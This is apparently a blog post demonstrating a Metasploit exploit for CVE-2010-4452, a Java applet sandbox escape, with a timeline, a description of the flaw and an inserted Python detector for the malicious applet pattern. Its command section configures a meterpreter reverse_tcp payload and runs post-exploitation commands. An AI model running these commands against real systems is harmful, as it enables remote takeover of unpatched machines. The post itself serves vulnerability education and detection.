CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit
Timeline :
Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15
PoC provided by :
Frederic Hoguin
jduck
Reference(s) :
CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle
Affected version(s) :
Oracle JRE 6 & JDK 6 Update 23 and before
Tested on Windows XP SP3 with :
Oracle JRE 6 Update 16
Description :
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with:
1. A "codebase" parameter that points at a trusted directory
2. A "code" parameter that is a URL that does not contain any dots
the applet will run outside of the sandbox.
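To make the two conditions in the description concrete from a detection standpoint, here is an added example (not part of the original post or of the Metasploit module) that scans HTML for applet tags whose "codebase" is set and whose "code" parameter is a full URL containing no dots. The sample HTML, the host name attackerhost and the helper names are constructed for this example; whether a given codebase really points at a directory the JRE trusts is environment-specific and is not checked here.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class AppletCollector(HTMLParser):
    """Collect <applet> tags, merging nested <param name=... value=...> into the tag's attributes."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "applet":
            self._current = dict(attrs)
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            # <param name="code" value="..."> is equivalent to a code="..." attribute
            name = attrs.get("name", "").lower()
            if name:
                self._current[name] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def suspicious_code_param(code):
    """True when the 'code' value is a URL (has scheme and host) and contains no '.' at all.

    This mirrors the second condition in the description; a normal class name such as
    com.example.Chart.class contains dots and is not flagged.
    """
    parsed = urlparse(code)
    return bool(parsed.scheme) and bool(parsed.netloc) and "." not in code


def find_codebase_trust_abuse(html):
    """Return one finding per applet that combines a 'codebase' with a dotless-URL 'code'."""
    collector = AppletCollector()
    collector.feed(html)
    findings = []
    for applet in collector.applets:
        code = applet.get("code", "")
        codebase = applet.get("codebase", "")
        if codebase and suspicious_code_param(code):
            findings.append({"code": code, "codebase": codebase})
    return findings


# Constructed sample page: one benign applet and one matching both conditions.
SAMPLE_HTML = """
<html><body>
<applet code="com.example.Chart.class" codebase="/applets/" width="1" height="1"></applet>
<applet codebase="file:///C:/PLACEHOLDER_TRUSTED_DIR/" width="1" height="1">
  <param name="code" value="http://attackerhost/">
</applet>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_codebase_trust_abuse(SAMPLE_HTML):
        print("suspicious applet:", finding)
```

The check is deliberately narrow: it reports only the exact combination the description names, so it can be run over proxy-captured pages or mail attachments without flooding on ordinary applets; pair it with the vendor patch level check (JRE 6 Update 24 or later) rather than relying on it alone.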
Commands :
use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
I recommend reading these related posts:
- CVE-2008-5353 : Sun Java Calendar Deserialization Exploit
- CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo
- CVE-2010-0840 : Java Statement.invoke Trusted Method Chain Exploit
- CVE-2010-0094 : Java RMIConnectionImpl Deserialization Privilege Escalation Exploit
- CVE-2010-3563 : Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit
- CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo
- CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo
- CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo
- CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo
- CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo